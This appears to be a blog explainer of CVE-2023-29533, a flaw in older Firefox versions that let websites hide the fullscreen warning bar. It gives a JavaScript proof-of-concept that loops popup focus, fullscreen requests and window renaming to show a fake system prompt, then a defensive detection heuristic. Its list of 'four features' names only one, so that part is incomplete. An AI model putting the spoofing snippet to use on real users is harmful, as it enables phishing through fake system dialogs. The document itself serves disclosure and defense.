In early 2023, security researchers found a tricky vulnerability in multiple Mozilla products, tracked as CVE-2023-29533. This bug allowed malicious websites to hide the built-in fullscreen notification using some clever JavaScript tricks. Let’s break down how this worked, show a simple attack snippet, and discuss what this meant for users.
What Is a Fullscreen Notification and Why Does It Matter?
When a website requests fullscreen mode in browsers like Firefox, a warning bar appears at the top of the screen. This notifies users that a site has gone fullscreen, mainly to prevent "spoofing" — where a website pretends to be something it isn’t (like a fake banking site or a system dialog).
If sites could hide or mess with this notification, they could more easily trick users.
How Does the Exploit Work?
Mozilla’s security team discovered that a combination of four browser features could be strung together to trick the browser interface:
- setInterval: Repeatedly call code to keep up the attack
By using these together, attackers could repeatedly move between windows and fullscreen mode, temporarily obscuring or hiding the warning bar.
- The attacker opens a new window that quickly requests fullscreen.
- Fast JavaScript “loops” focus back and forth and change the window’s name/ID, confusing the browser.
- At just the right moments, the fullscreen notification bar can be hidden or “covered,” making it seem like you’re not in fullscreen — but you are.
Here’s a simplified exploit snippet (do not use maliciously!):

```javascript
// Trick to obscure fullscreen notification on Firefox <112
function spoofFullscreen() {
  let popup = window.open('', 'full', 'width=600,height=400');
  popup.document.body.innerHTML = '<h1>This Could Be a Fake System Prompt!</h1>';
  popup.window.name = 'truename';
  // Loop rapidly to keep things in fullscreen and shift focus
  let spoofInterval = setInterval(() => {
    try {
      popup.focus();
      popup.document.documentElement.requestFullscreen();
      popup.window.name = Math.random().toString(36);
    } catch(e) {
      clearInterval(spoofInterval);
    }
  }, 100);
  // This can obscure the fullscreen notification bar
}
spoofFullscreen();
```
What users would see:
A window that looks like a system alert, a login screen, or any fake UI — with little sign they’re in fullscreen mode.
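From the defender's side, the call pattern described above can be recognized in a trace of window API calls. The following is an added example, not code from the original article or from Mozilla; the trace format (`{t, win, api}`), the sample events, and the two thresholds are assumptions made for illustration.

```javascript
// Added example: heuristic over a CONSTRUCTED trace of window API calls.
// The event shape {t, win, api} and both thresholds are assumptions.
function buildSampleTrace() {
  const trace = [
    { t: 0, win: 'w1', api: 'window.open' },
    { t: 0, win: 'w2', api: 'window.name=' },        // benign: name set once
    { t: 200, win: 'w2', api: 'requestFullscreen' }, // benign: one request
  ];
  for (let k = 1; k <= 5; k++) {                     // 100 ms timer cadence
    trace.push({ t: k * 100, win: 'w1', api: 'focus' });
    trace.push({ t: k * 100 + 1, win: 'w1', api: 'requestFullscreen' });
    trace.push({ t: k * 100 + 2, win: 'w1', api: 'window.name=' });
  }
  return trace;
}

// Flags windows where "requestFullscreen then window.name write" repeats
// at least minCycles times inside any span of windowMs milliseconds.
function findFullscreenChurn(trace, { windowMs = 1000, minCycles = 3 } = {}) {
  const byWin = new Map();
  for (const ev of trace) {
    if (!byWin.has(ev.win)) byWin.set(ev.win, []);
    byWin.get(ev.win).push(ev);
  }
  const flagged = [];
  for (const [win, evs] of byWin) {
    evs.sort((a, b) => a.t - b.t);
    const cycles = [];          // timestamps at which one full cycle completed
    let sawFullscreen = false;
    for (const ev of evs) {
      if (ev.api === 'requestFullscreen') sawFullscreen = true;
      else if (ev.api === 'window.name=' && sawFullscreen) {
        cycles.push(ev.t);
        sawFullscreen = false;
      }
    }
    let best = 0;               // densest run of cycles within windowMs
    for (let i = 0, j = 0; j < cycles.length; j++) {
      while (cycles[j] - cycles[i] > windowMs) i++;
      best = Math.max(best, j - i + 1);
    }
    if (best >= minCycles) flagged.push({ win, cycles: best });
  }
  return flagged;
}

console.log(findFullscreenChurn(buildSampleTrace()));
```

A single user-initiated fullscreen request, as in the constructed `w2` events, never completes a cycle and is not flagged.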
Preventing quick window switching from hiding warning bars
See the official security advisory:
- Mozilla Foundation Security Advisory 2023-18
- NIST NVD entry for CVE-2023-29533
- Mozilla Bugzilla bug 1827666
Conclusion
CVE-2023-29533 shows how complicated browser security can be. Even features meant for safety (fullscreen warnings) can be bypassed using old tricks and timing attacks. Keeping your software up to date is the best defense. Remember: if something on the web looks and feels a little too much like a real app or system window, it might not be what it seems.
Stay safe, stay updated!
Timeline
Published on: 06/02/2023 17:15:00 UTC
Last modified on: 06/21/2023 15:33:00 UTC